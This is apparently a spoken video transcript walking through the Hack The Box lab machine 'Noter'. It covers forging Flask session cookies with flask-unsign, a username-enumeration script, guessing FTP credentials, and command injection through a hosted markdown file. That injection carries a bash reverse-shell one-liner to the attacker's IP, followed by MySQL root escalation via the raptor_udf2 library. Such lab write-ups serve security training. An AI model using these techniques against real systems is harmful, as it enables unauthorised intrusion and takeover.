Well, hello everyone, this is Mohammad Badruddin. Hope you all are doing well. Back again with another video, and today we are going to solve another machine from Hackthebox. The difficulty level of this machine is medium and the name of the machine is Noter. So without wasting time, let's go and we will start that machine from the reconnaissance phase, and especially from the active reconnaissance where we scan the services and ports published on the target over the internet or publicly published. So if you did not subscribe the channel, please subscribe it and hit the bell icon so you get all the notifications. So let's go. Nmap space -s capital V for the version enumeration, space -s capital C for default scripts, and 10.10.11.160. This is the target IP, and I'm gonna save the scan results in default.nmap because to save the time I already ran that scan, so I'm just going to show you the result of this. So cat default.nmap, and there are 3 ports open. So the first port is port number 21. This is the TCP port. The port state is open, and the service running over it is FTP, and the version of FTP is VSFTPD 3.0.3. The second port is port number 22. Again, this is open, and this port is default for SSH, and the same service running over here, and the version of this service is OpenSSH 8.2p1. Third port is port number 5000, and this is TCP port. Again, the state of this port is open, and this port is used for HTTP service, although the default port for HTTP is port number 80. And there is server information or service information running on port number 5000. So this is HTTPD server 2.0.2, okay, Verzig, and it's running over Python maybe. We will see that in a minute. And the website or web application published on this port has title Noter. Fine, so this information is pretty awesome, and we already come here and we already open up here. I already made a record in etc host file with the IP address of name noter.htb, so now you can access that with the port 5000. So welcome to Noter. Do you forget stuff quickly? Do you want to keep your work organized and clean? We got your back. Noter, the best note keeping application on the internet. So this is some kind of application where you can put your text documents, or maybe PDF, means you can, overall I can say you can put your documents. That's it. With more information, we may have more surface to attack or to check the vulnerabilities. So this is what web, and http:// noter.htb, and port number is 5000. So let's see what that gives us. Not much different from the Nmap, but Bootstrap 3.3.7, HTML5 it's using, and HTTP server is same like what we saw, HTTPD Verzig 2.0.2, and it's using Python 3.8. Fine, that's perfect. So now come here, and I will go to the page source, and in the page source, if you see, there is nothing much interesting. Fine, so going back to the application, and I already open up the burp proxy here. I'm going to enable the burp proxy on my browser, and I am going to manage this a bit so that you can see both of the windows simultaneously. So I'm going to register my user, test at west. Username is gonna be test, and the password 123456 123456, and just submit that. And as we submit, we got here the request. This is the post request, and here we got the login page. We are redirected to the login page with the message that you are now registered and you can sign in or log in. So if we see this post register request, you will find here that in the response, the server assign a server setting a cookie or assign a cookie, which is going to be the session cookie, right? Next thing, I'm going to log in. So test 1 2 3 4 5 6, hit enter, and as we hit enter, we get to the dashboard. And this is again, once we log in, server again in the response set a session cookie, and that seems a JWT token. But let's see, explore a bit. So there is a tab, notes, going to this, but we have no notes here. And go back to the dashboard and go to the add note. Let's see we can add it or not. So there you can add the note. Fine. Okay. Now if we come here in the request of node, the same. Now in the session, in the request, you get the session ID. So until you log out, in every request you will get the same session ID or session cookie. So, and this is the JWT, which is authorizing your session. And with this session ID or with this session cookie, the server will know that this user has only this authorization to access these resources. Fine. Okay. So now I'm going to copy this session cookie, which seems to be JWT, and disable the burp proxy from my browser. And I am going to open jwt.io. Okay. And come down, scroll down, and here just paste your session cookie, which is JWT. So if you want to know more about JWT token, how that works, and how you can test the vulnerability, what are the areas where you should look for the vulnerability. So I already created or recorded a playlist about JWT vulnerabilities from the Web Security Academy. You can go back and watch that playlist and you will know too much. So here, but I am going to brief a bit. So in JWT there are three parts. First part, and all these three parts separated by the dot. Fine. So the first part is known as header, which you see here. The second part is known as payload or data, which you see here. And this third part is the signature part. Fine. In the first part, which is header part, in header part, the algorithms are defined, methods are defined. In the second part, like the algorithm is symmetric or asymmetric. So if you see in any JWT token, HMAC, SHA or HSHA, that means there is symmetric algorithm used in that JWT token. And if you see RSA, RSHA, that means it is RSA SHA 256, and it is known as asymmetric algorithm. So there are many symmetric and asymmetric algorithms, but most of the time you will see HMAC or RSHA. So in symmetric algorithm, there is only one key to sign and to verify the token. Okay. In asymmetric algorithms, to sign the token, we use private key, and to verify the token, we use the public key. So private key must be secret, but public key, you can distribute it with the trusted client so that they can verify the token. Fine. So here, that's it. In details, you can go to the JWT playlist. Fine. So now you can see login is true and username is test. Okay. But this data part is gibberish or hashed or maybe encrypted. So there could be a secret key with which this payload is hashed. So what we can do here, the approach we can adopt is to brute force JWT. And to brute force the JWT, there are many tools. So if you go to GitHub, let's say GitHub Flask Unsign, this is the first tool, and this is pretty awesome tool. So this is the first one. Just click on it, and this is the tool. So you can clone the repository from here, and you can also install it. So if you want to install it, you can install with the word list, and you can install without the word list, right? So I already installed that in my machine. If you did not install, you can just install it. It's a very simple command: pip3 install and flask unsign. So now what I'm going to do here, I'm going to actually paste that JWT token here. Now flask unsign, and here flask unsign space -h. Let's see the switches. So the first switch I am going to use is unsign. Okay, so space -- unsign. So the second, so the unsign we used because I wanna attempt to crack the session signature by iterating over a given word list. Now the second thing, you need to provide here the word list, and to provide the word list, this is the switch to use we use. So paste it here, and the word list I'm going to use here is user share word list and rocku.txt. Fine. Next, I need to specify the cookie. So space -c, or you can write here -- cookie, and paste that. Fine. One more thing I wanna mention here, that this option is pretty good. Why? Due to the fact that a lot of secret keys are binary strings. So all lines in the word list are encapsulated with double or single quotes to represent Python string. This is done so it's easier to generate word list without having to store the data in an arbitrary binary format. But here I'm just going to hit enter, and we will wait a minute. Something bad happened and we messed up something. Let's see. Failed to find secret key after 0 attempt. Okay. - cookie, and let's try to use this one. Here hit enter, and now it's working. So this is the same case here, and as we hit enter we got the secret key, and you see here this B sign, that means this string is in byte. I'm going to log in with test 1 2 3 4 5 6, and we log in successfully and we got this key. So the thing is, we do not have the user. From any source we need to know the username, and in the initial scan we know there is port number 21 open. So let's try port number 21 if there is anonymous login enabled or not. So ftp 10.10.11.160, and it's asking for root but anonymous, and the password is anonymous, and no, anonymous login is not there. So you must log in ftp with user. Okay, So we have only two things, FTP and this on 5000 port we have web application. So we need to know and we need to enumerate the users. We can test something like if I say admin and the password is 123456, hit enter, there is invalid credentials. If we put my user but put the wrong password, let's say 000, hit enter, don't save, and this time we got invalid login. So you see the difference. I think if the user is genuine, you will get invalid login, but if the user is not genuine user, you will get invalid credential. So because the test user is already inside the database, so it's saying invalid login, means the password is incorrect. But if instead of test I say a and this user I don't think present in the database, means the username is wrong, and if I submit, and you can see invalid credentials, that means there is a vulnerability to enumerate the user. So we can enumerate the usernames. And for this I am going to very quickly create a Python script, because if we enumerate the user with the burp suite, it is gonna take ages. So let's see, but I want to we already have the login request here, which is the post login request. So on this basis I'm going to build my Python script. Fine. Okay, come here and let's do this. Shebang user in Python 3, and let's import the module. So import request, import URL lib3, and to avoid the warnings, URL lib3 dot disable underscore warnings. Then proxies equal to, in the dictionary, okay, so I'm gonna use HTTP proxy, and the URL of HTTP proxy is gonna be this, and for HTTPS the URL is gonna be the same as HTTP because we don't have HTTPS. Okay, fine. Now the next thing is we need to define the URL, which is going to be this. We will define it in a minute. Next thing, okay, now define a method. So define user underscore enum, and this method needs URL. Now file is equal to the file I am going to use is user share word list slash sec list slash username or usernames. Let me check that. Come here, clear. So cd slash user share word list sec list. Inside sec list there should be usernames s slash, come here, ls space hyphen la, and I'm going to use this list. Fine. So copy, come here and paste that. That's fine. Now we need to read this file because all the username is there. So we can do that with this, with open, and because this is file is a variable name, so we don't need to put it in the single quote or double quote, but we need to read this file, so we will specify r, and the output will be as out file and here I'm gonna say users is equal to out file dot read that out file and split it whenever you find a next line. Fine. Now we have all the users in the user variable. Now we need to loop it. So we will take one user from the users. Okay, and we will create our data. So data for the post request, because this request method is using post request method. So data is going to be where is it? Come here. This is the data. So copy this, come back here, paste it here, but you just need to adjust it a bit, and instead of test I'm gonna put user comma password is gonna be, let's say 11111, like this. So because username I'm going to take it from the for loop and from the users, because all the users we put in the users variable, and we will take one by one every user from that. So the data is ready. I'm gonna save this file. So we have some colors and it will be good. User underscore enum dot py. I already write these kind of strings. I already write these kind of scripts in the authentication module of Web Security Academy. So you can again go there, and there you will find much better scripts and much complex scripts. So okay, for here this is so after data we just need to send the request. So request dot post, and in the post request what we need here is URL is equal to URL comma data is equal to data. So now as you can see here in this request there is no cookie. There is no cookie at all. So we don't need cookie, we don't need header, because there is no special header here. Okay, so that should work without cookie and header. So we have the request. Now rs is equal to, this is going to be response r dot text, and now we will filter this. So if come here, if you put the right user, like test is the right user, if you put right user, you will see, come on, what is that? Maybe it's deleted. Yeah, maybe the application deleted the user. So let's make it one more time. Test test at west, and username is test, password is 123456, confirm password 123456. Submit that and submit. Okay, now if you put the correct user with wrong password, so you will see invalid login. That means if we get here invalid login message in the response, that means we got the user, we got the correct user. So here we need to print that, and print what? We need to print plus we found a valid user, and the valid user is going to be user which comes from this loop. So it is going to print that, and here we can also print a message for the user, print and we need to print I. Please wait until we finish, like this. Okay, and now everything is perfect. We just need to call this function. So we need to call this, copy and paste it here, and here we just need to specify the URL, which is going to be noter.htb:5000/login. Fine, save it and just run it. One thing, where is the request? This is the request. If you want this request to pass through the proxy, through the burp suite, you can specify here comma proxies is equal to proxies. Fine, so I'm going to just show you proxies is equal to proxies. Save it and come here in the burp. Just I'm going to clear all, clear history, and go to the terminal and Python 3 user. Oh, I'm in the wrong place. cd desktop htb noter and Python 3 user enum.py. Hit enter and it's working, and here you are getting the request, and as you can see all the usernames are there, whatever in the list. Fine, so I'm going to pause the video, and once it's finished I will come back. Welcome back guys, and as you can see we got a valid user which is blue. So let's test this user, and our script is still running, so let it run. Maybe there are other users too. So let's see, blue, and we don't know the password, but if we get the invalid login message, that means the blue user is the genuine user. And invalid login, that means the blue user is genuine user and our script is working fine. Now because we know the username, and we can create the I must write here one thing which I forgot, that the secret key we got here is secret 123. So we have the secret key, and we can generate or we can manipulate the tokens. So the next thing we found is valid username, which is blue. Fine, and if we just take this header part, so in the header part you find that there is login true, username is admin, and algorithm is HS256, which is HMAC SHA256, and this is the symmetric algorithm. So if we just take the header part, you will get these values. Fine, so I'm going to copy this, come here, just paste that. So in the initial request we did not, in the initial cookie or JWT we did not get that, but there is either the algorithm is HMAC SHA256 or RSA SHA256, or it could be none. There is, or it could be none. Fine, so let's go, and we are going to first we need to log in with the test user. So test, and the password is 123456. Don't save, we are logged in. Now go to the inspect, and in the storage we find this cookie. Right now we need to create this cookie for the blue user. So we can actually sign, because by just putting the username it is not going to change the payload. So you need to sign the token also with the secret key, and for this we are again going to use the same tool, which is Flask unsign. So clear, and just make it horizontal and leave it running. So Flask unsign, and here -h. So last time we actually unsigned the token. Fine. And this time we need to sign the token. So come back here, sign the token. And before we unsign the token. So sign a session with a specified secret key, often used for session manipulation, and it requires the secret key. So the first thing is -sign, and the second thing you need secret key. So the secret key is secret123. Fine. Now you need to put the cookie value. So cookie, and the cookie value you must put it here, like we are not going to use this algorithm section. Come on. Fine. So you need to put the header part like this. So copy that, come back here, and paste it here. Fine. So now we have everything, but the important part is just change the name, which is blue. So we are going to sign the token with this secret key, and the cookie is going to be this. Just hit the enter, and this is the token. So I'm going to copy this, although it seems a bit different from my point of view, but let's see whether it works or not. I know it will make a problem. I know it. I'm feeling it. So paste it, hit enter. So now we just put the session for blue, and if we refresh this page, the session we will get here, that must be blue. But internal server error, I know this problem because I do not see this token is good. Why? Because this T I think should be capital T. Login true, username. Okay, maybe we already use, make it like this, true. What was that? Okay, clear. And here it should be double quote, and this time that seems perfect. So I'm going to copy this, come back, and just change the JWT session cookie, and now refresh it. And once we refresh, we should get the user as blue, and as you can see, welcome blue, and this is the title. So before we do not have any note, but maybe here you will find something. So if we click on note, you have two notes here. The first one is Noter Premium Membership. So blue user has the premium membership, and there you have a message. So hello, thank you for choosing Premier service. Now you are capable of doing many more things with our application. All the information you are going to need are on the email we send you. By the way, now you can access our FTP service as well, and your name is blue and the password is blue@noder. Fine. And the user who sent this mail is FTP admin. So we got here very good information and more information. The first thing is password. So the password is this. So copy that, come back here, paste it, and the second username we got, maybe we needed ftp_admin, right? So this is the second username. Now let's log in with FTP, as it mentioned that we can. Okay, here you can see we also got the test, which is our user. So script is working fine. Okay, so FTP 10.10.11.160. Now the username is blue and the password is copy, paste, hit enter, and login successful. Now listing the files and directories, and there are two files, actually one directory and one file. So first of all, let's see what's inside files. ls, and there is nothing. cd ... ls policy. So let's get this, get policy.pdf. Yeah, transfer done. So we should have here noter. Here it's in. Oh, it's in the root directory. Okay, root, and this is policy.pdf. I'm going to cut it and come back to the noter and paste it here. So this is the policy.pdf, and we are going to just open it. Now I'm going to minimize it. Okay, so here this is actually a password policy for this organization, and there are many things like overview, scope, and then policy and password protection, how it should be enforced, password aging, like up to how many months it should be active, and password creation. So how the password should be created means for all the default user, then user will log in with the default password for the organization, and then he can change the password. So that seems interesting. So the password must be at least 8 characters long, and strong passwords are encouraged. Okay, password must be completely unique and not used for any system, application, personal account, or servers. Default user password generated by the application is in this format. So username, then @ and then the site name. So site name, what we get is noter. In the site title, HTTP title was noter. So that is pretty awesome. Copy, come back to our notepad, and here you can password, and you can paste it here. Now you can generate the password according to that. So the password is going to be ftp_admin. This is the username, then @ sign, and then the site name. So if you see the blue password, blue username password, it is also same like that. So the site name is noter, but you can if you see closely, you will see that N is capital. So I'm going to follow the same apostrophe. Okay, now let's go and let's try to access the FTP with this user. FTP, and username is ftp_admin, and the password is going to be this. So copy, come here and paste that, hit enter, and we are logged in. So ls, and we found 2 zip file, and this is the application backup files. Second thing interesting is this backup is taken on November 1st, 2021, and this backup is taken later in December 1. That means if you see this part, so this is the bigger number. So this is for December and this is for November. Fine. So now let's mget star. Let's take both of these files in our system, but again these both files will go to there. Anyway, we will paste it. Yes. So go here, root, and this is the first file, this is the second file. Control X, come back to the noter and paste it here. Fine. Let's now extract the here, and this is also this is also I'm going to extract it, and we will identify from this number. So this file 16383, this is the December backup and this is the November backup. Now let's see what's inside these directories. So there is app.py. I'm interested in that. First of all, I wanna close this. Okay, and close this. Now come here and open this file, app.py. Okay, go back here, go to the noter. Now go to this directory, and this directory also have the same files because these are the backup of same application folder. So again, I'm going to open this file too. Now I'm going to actually compare, because this is on November 1 and this is the backup of December 1st. So maybe there are some changes in the code. So I'm gonna copy all this string and go to the Burp Suite, and I wanna show you one very awesome feature of Burp Suite. Go to the comparer, and here you can actually load files from. So I'm going to load files. You can also copy and paste, but you can also load. So HTB and noter. This is the first one, which is for November 1st, app.py. So we load this, and now load other file, which is this one for the December backup. Okay, and now just click on words, because we want to compare both of these files in words, not in bytes. Words, right? So there is the comparison. So the first thing first is here the modules which are imported here are same. The difference is highlighted here. So you can see there is MySQL credentials or MySQL configuration, database configuration is there, where the username is root, but here the username is DB user. And this is for the, so the first file we loaded from the November and the second file we loaded from the December. So this is the November file. See, there is username and password for the database is there, and the database name is app. And yeah, there is one more change, and the change is in export note method. Where is export note method? So in November there is no method for export note. And if we come to the application, go to the dashboard, because we are logged in as blue, so you can see export notes is there. This is the feature, and this feature is for export to PDF and export directly from cloud. So existing file you can export, and here you can export from the cloud, means from the external sources, right? Go back here, sorry. Fine. So export method, first of all, it is going to check whether the user is logged in or not. So it created one method for login, checking login, and it's calling this method here. So first thing is to check whether the user is logged in or not. Then it is going to check whether the user is VIP or not. If the user is not VIP, that user cannot see this feature, export feature. This feature is only for VIP users, because once we logged in as a test user, we did not see import or export. So this feature is only for VIP users. Okay, then it is going to connect with the database and it is going to execute the query, which is this query. So there could also be a chance for SQL injection, but we will see that. Then it is going to fetch all the nodes, and if the result is greater than 0, then it is going to render the template. Okay, and the application is built on Flask maybe, and it's using, if it's using some kind of template engine, maybe there is also the chance of server-side template injection, SSTI. Then closing the connection. Fine. Okay, so this was export node and export node underscore local. This is the another feature, and for this feature it is using the get method. Here it's using get and post both. Now the second method of exporting files is pretty convincing and pretty interesting for me, because here you can see it is executing the command. So the same thing, it's first of all it's gonna check whether the user is logged in or not, and whether the user is VIP or not, then connect to the database, executing this same query, and then it is going to choose any random number between 1 to 10,000. Then it is going to execute, this is going to define this command here, and in the sub process module it is going to run that command. So as you can see, in the sub process, within the sub process, it is going to call this command variable, and inside command variable this is the command. So in my mind, what we can do here is we can copy these lines to see how that command look like. Copy, come here, open new, paste these. Okay, so random comma subprocess. Okay, and that's it. Let's just print command, and we don't need this subprocess for now. Save it as test.py, save it, come here, exit, clear, python 3 test.py. Note is not defined. Note is not defined. Where is note? This note, and here we can say note is equal to this is me, like this. Save it and execute that again. String index must be integer. Line number 6, which is this. So let's see here, we just take note. Fine, save it. Okay, so now what, this time it's working. Now what actually happening here is it is going to use node miscellaneous md to pdf.js, and then whatever node you have, and then it is going to put the random integer between 1 to 10,000. Fine. And then it is going to send this command. This is the command, and it is going to send this command with the sub process. So what if I do here a trick like I say whatever is in the dollar, let it like this, it's closed, and from here it is going to start a new command, and then it's going to end this command, because this is the parameter which we can control, right? We cannot control this, we cannot control this, but this part we can control. So note this and put it like this. So what will happen, now let's see what it's going to put in the command. So hit enter. So now the command looks like this. So this is going to be the first command up to here, and it will consider after this semicolon sign, it is going to consider this as a next command, and again on this semicolon sign it will say, okay, the first command is completed, now it's time to start the next command from here. Now I will give you one example, like who am I? You might have seen me running this command many times. Hostname, ID, who am I, ID and hostname. Hit enter. So now it is going to execute this command, and then this command, and then this command. So similarly we can control like this. Fine. So in that part, node part, we can put a reverse shell payload, and the reverse shell payload should looks like this. Bash, like this, bash, and then space hyphen I, fine, greater than and /dev/tcp, and then my IP, which is 10.10.14.51 slash port, let's say 9090, and then 0 greater than and 1. Fine. And then close this with semicolon and with single quote. That's it. So we need to put this value inside. Let's create one more file. I'm going to close this, close test.py2. Okay, and just paste that, save it. But before saving it, I want to show you one more interesting part. So if we come to the compare, you will see here the command is node miscellaneous md to pdf. So it's this md to pdf .js, this JavaScript file is actually converting the MD5 into PDF file. So what we need to serve here is MD file. So it will read my file as MD file, and it will try to convert it to PDF. But this whole string will be as a command, and again it will run with the sub process. So in my mind, what we can do is we can save this as rev.md, means reverse shell.md. Save this, come back here and go to the export nodes. Fine. And before, come here, and we are going to serve our malicious MD file to the server. So we must have a server which publish our malicious MD file. So Python 3 space -m http:// dot server on port number 80 or whatever port you want. So hit enter. Okay, clear here, and here I'm going to listening on port number 9090, which we mentioned in the reverse shell one-liner. Hit enter. This is done. So I'm going to exit this one. Fine. Now let's see, go back to the application, and here I'm going to specify the URL, which is my IP, my server 51 slash rev.md. That's it. Just export it and come back here. You can see it, we got a hit and it calls the file, and here we go. Now it's executed and we got the reverse shell. So who am I? I am SVC ID is 1001. Let's see, there should be one more user. So grep /bin/bash from etc pass wd. Hit enter, and there is one more user. No, there is no user. There is only SVC and root, those who can run bin bash. So cd, go to its home directory, ls space -a, listing the files, and we have the root.txt, which is the first flag. So cat user.text, hit enter, and we have the flag. Fine. Now let's go. So netstate space -tlpn and hit enter, and here you can see there is a MySQL port is open on localhost. That means we can access the database, and we already got the database credentials from here. So if we go up on the November backup, copy, come here. So this is gonna be the backup. Fine. So username is root and this is the password. So I'm going to copy this password, go to the terminal again, MySQL space -h localhost space -u is gonna be root space -p for the password. You can also specify the database name with space -D. So hit enter. It is going to ask you for the password, which we have here. Control C and Control Shift V for paste the password here. Hit enter. Okay, because it's logged in, otherwise it will throw the error. It does not throw the error, that means it's logged in, but we have broken shell. Because we have the broken shell, that's why we cannot see the terminal here. Show databases, and you know what, once we exit we will get the result. See, when we exit we get the database name. So app database is there, information schema, this is the default, MySQL is there, performance underscore schema, and test. These three databases are there. I'm sorry, 5 databases are there. So we need to get the reverse shell, stable reverse shell. I'm going to exit, and here I'm going to use the poncat again. So poncat -cs space listening the port on 9090. Hit enter. Our server is ready to serve the malicious MD file. Come back here and again just hit export. Go back to the terminal. We get the hit on our HTTP server. That means our server already served the malicious MD file, but the poncat is still, now it's listening. We need to actually, after it start listening, we need to hit export button again, and this time we will get the connection. So we get the correction, just write back so that you can get the shell terminal. Fine. Now it's stable. Here you can also use arrow keys and you can also use the tab key. So mysql space -h localhost space -u, that is root space -p for the password, hit enter. And the password we already have here. Copy, come here and just Ctrl+Shift+V to paste and hit enter. And this time we have the interactive shell and we got the terminal here. So now show databases. There is no database like users, there is only app. Use app, show tables. There is users and nodes. So select star from users. So using all from users, and there is only blue. We already have the blue credentials, so we don't need that. Okay, so let's switch to another database, which is a database, let's say test. This is the database. Show tables. There is no table. Fine. So I'm going to take this information, this version information, and I'm going to keep this version information with me. So maybe we will get if there is any exploit with this version of MariaDB. So let's search it. Copy, come here and paste that exploit. So there is CVE 2021 27928 MariaDB SQL. WS rep provider, I don't know what it is, we will see it in a minute. There is one more, MariaDB 10.3 sync database vulnerability and command execution. This is 2021 and this is, we don't know. So we need to see few things like command execution and this one and this first one. Let's see what we have. What you can do, MariaDB 10.2 before 10.2 and 10.3 before 10.3.08. We have above of this. Why not we go to Hackthebox, MySQL privilege escalation and hit enter. And there is privilege escalation. So let's see this part. Where is it? This is the privilege escalation part. And privilege escalation via library. Okay. And this library, we can have that library from here. So I open it. And this is the library. Fine. So I'm going to copy this whole thing, clicking on this sign, Control A, copy, come here, and instead of just close this, we already have it, come here and paste that whole. So now here they mentioned how you can execute this privilege escalation Okay, so and we are going to take out this part. So you need to select the database, which is this, and you need to create a table. Then inside table you need to specify that library which is not this one, which is Raptor UDF2. So we need to change these all the commands little bit. We have everything ready, so now let's go and we will do this. Come here. Okay, so we can put here nano and Raptor underscore UDF.c. It could be UDF2, whatever the name is, doesn't matter. Hit enter and come here, copy all of this, come back here and just paste the selection. Control O, enter, Control X, cat raptor.c, raptor udf2.c, and yeah, it's perfect, clear. Now gcc space -g space -c and raptor, and yeah, this time it's worked perfectly. We have raptor.o. So now we need to make it raptor.so, and how we will do that is gcc space -g space -shared and -W comma so name comma raptor underscore udf2 dot so, and that's how we will create so file, raptor underscore udf2 dot so, and then from which raptor underscore udf2 dot o, right, space -lc. This is how we will create it. Hit enter. Did you mean -wa? Actually the problem is clear. This should be home. This should be L. Hit enter. So name does not recognize. Why? Let's see. Is the problem coming from space? If it is, very annoying because it's running very slow. And again, so name comma, remove the space from here also. Hit enter. Let's see. Yeah, this time that works. ls, and we have raptor udf. Oh, come on. sa. Oh, we made a major mistake again. Clear this. It should be so. So rm space -rf raptor udf dot sa. Delete this, and we have the problem here. It should be so. That's it. So hit enter and ls space -la. Yeah, this time we have so. So I hope this time it will work. So let's go. MySQL space -h for localhost space -u for root user space -p for password. Hit enter, and we have it here. We already have password. Copy, come back here, paste it, hit enter, and now we need to execute these commands. So use MySQL database, hit enter. Now create a table. So copy, come back here, paste that, hit enter. Okay, now we need to insert the library to the table. Okay, then we need to see the plugins. So copy, come back here, paste, and then we need to dump it, paste, hit enter. Okay, one row affected. Now create the function. I'm creating do system function here. Okay, 8888, hit enter, and copy this, come here, come here and just paste that. So hit enter. What it's saying, trying to reconnect. MySQL.do_system is not there. Okay, execute that again. Does not exist. Let's do from here, maybe copy, paste that. Yeah, because the table is deleted, so we need to really perform this task very quickly before it deletes the table. Paste that, hit enter, again come back here, copy and paste that, hit enter, then copy, come here, paste that, hit enter, copy, come back, paste, hit enter, and now copy, paste it, hit enter. And yeah, this time we got the shell. Yes, we got the shell. So we are root. If I say ID, we are root. Who am I? Host name. Yeah, everything is good. Clear will work or not, I don't know. No. Export term is equal to xterm, and now clear will work. Fine. cd/root, it's the root home directory, ls space -la, and we have here root.txt. So cat root.txt, hit enter, and we got the root flag. So that's it. This is the whole thing. We compromise the whole machine and we have the whole sole authority now. So that's it for this video. If you like the content, like, subscribe and share. See you in the next video. Bye.